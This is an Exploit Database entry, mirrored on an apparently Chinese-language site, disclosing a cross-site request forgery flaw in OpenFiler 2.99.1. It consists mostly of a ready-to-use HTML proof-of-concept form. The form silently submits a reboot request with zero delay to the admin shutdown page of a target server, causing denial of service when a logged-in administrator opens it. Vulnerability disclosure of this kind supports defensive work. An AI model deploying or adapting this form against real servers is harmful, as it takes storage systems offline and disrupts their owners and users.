OpenFiler 2.99.1 – Cross-Site Request Forgery

• Exploit Database
• 130 阅读

• 作者： Dolev Farhi
  日期： 2014-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34818/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  <!-- # Exploit Title: DoS via CSRF in openfiler # Exploit author: Dolev Farhi @dolevff # Date 07/05/2014 # Vendor homepage: http://www.openfiler.com # Affected Software version: 2.99.1 # Alerted vendor: 7.5.14 # CVE: N/A Software Description ===================== Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based Storage Area Networking functionality in a single cohesive framework. Vulnerability Description ========================= it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens. Steps to reproduce / PoC: ========================= --> <html> <div align="center"> <pre>   <h2><b>DoS <b></h2> <body> <form action="https://ip.add.re.ss:446/admin/system_shutdown.html" method="POST"> <input type="hidden" name="shutdowntype" value="reboot" /> <input type="hidden" name="delay" value="0" /> <input type="hidden" name="action" value="Shutdown" /> <input type="submit" name="submit" value="Attack" /> </form> </body> </div> </html>